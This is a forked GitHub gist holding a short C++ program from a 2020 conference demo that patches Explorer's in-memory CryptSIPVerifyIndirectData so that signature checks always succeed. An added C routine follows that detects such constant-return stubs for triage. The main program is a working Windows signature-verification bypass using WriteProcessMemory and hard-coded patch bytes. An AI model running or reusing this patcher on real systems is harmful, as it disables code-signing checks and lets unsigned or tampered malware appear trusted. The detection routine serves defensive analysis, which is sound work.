@gavz
Forked from aaaddress1/signBypass.cpp
Created May 3, 2024 22:14
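// iThome 2020 Demo: Signature Patcher for Explorer
// author: aaaddress1@chroot.org
#include <cstdio>
#include <iostream>
#include <Windows.h>

int main() {
    // Resolve the PID of the Explorer process that owns the taskbar window.
    DWORD explorer_pid = 0;
    GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", NULL), &explorer_pid);

    // Despite its name, `token` is a process handle.
    if (HANDLE token = OpenProcess(PROCESS_ALL_ACCESS, FALSE, explorer_pid)) {
        // Overwrite the entry of Crypt32!CryptSIPVerifyIndirectData inside Explorer with
        // 48 31 C0 (xor rax, rax), FE C0 (inc al), C3 (ret), so it always returns TRUE.
        // The address is resolved in this process and reused in Explorer.
        WriteProcessMemory(token, GetProcAddress(LoadLibraryA("Crypt32"), "CryptSIPVerifyIndirectData"), "\x48\x31\xC0\xFE\xC0\xC3", 6, NULL);
        std::cout << "[+] Explorer.exe Patch Done." << std::endl;
        CloseHandle(token);
    }
    else {
        std::cout << "[!] Explorer.exe Alive yet?" << std::endl;
        getchar();
    }
}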
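
For triage, the inverse check, as an added example that is not part of the gist or the author's code: given the first bytes at the entry of CryptSIPVerifyIndirectData as captured from a process (the capture itself is not shown), decide whether they are a constant-return stub like the six bytes written above. The function name, the sample arrays and the small set of decoded instructions are assumptions of this example; it goes beyond the gist's exact bytes to cover a few equivalent encodings.

```c
#include <stddef.h>
#include <stdint.h>

/* The 6 bytes the gist writes, and a constructed ordinary x64 prologue. */
const uint8_t GIST_PATCH[]    = {0x48, 0x31, 0xC0, 0xFE, 0xC0, 0xC3};
const uint8_t NORMAL_PROLOG[] = {0x48, 0x89, 0x5C, 0x24, 0x08, 0x57};

/* Returns 1 and stores the constant in *value when `code` decodes to
 * "put a constant in EAX/RAX, then ret"; returns 0 for anything else. */
int returns_constant(const uint8_t *code, size_t len, uint32_t *value)
{
    uint32_t eax = 0;
    int known = 0;              /* is EAX a known constant yet? */
    size_t i = 0;

    while (i < len) {
        size_t rex = (code[i] == 0x48) ? 1 : 0;    /* optional REX.W */
        const uint8_t *p = code + i + rex;
        size_t left = len - i - rex;

        if (!rex && left >= 1 && p[0] == 0xC3) {               /* ret */
            if (known) *value = eax;
            return known;
        } else if (left >= 2 && (p[0] == 0x31 || p[0] == 0x33) && p[1] == 0xC0) {
            eax = 0; known = 1; i += rex + 2;                   /* xor eax,eax */
        } else if (!rex && left >= 5 && p[0] == 0xB8) {         /* mov eax,imm32 */
            eax = (uint32_t)p[1] | (uint32_t)p[2] << 8 |
                  (uint32_t)p[3] << 16 | (uint32_t)p[4] << 24;
            known = 1; i += 5;
        } else if (known && !rex && left >= 2 && p[0] == 0xFE && p[1] == 0xC0) {
            eax = (eax & ~0xFFu) | ((eax + 1) & 0xFFu);         /* inc al */
            i += 2;
        } else if (known && left >= 2 && p[0] == 0xFF && p[1] == 0xC0) {
            eax += 1; i += rex + 2;                             /* inc eax */
        } else {
            return 0;           /* anything else: not a constant-return stub */
        }
    }
    return 0;                   /* ran out of bytes before a ret */
}
```

A hit with a nonzero value on a signature-verification export means the function reports success without checking anything.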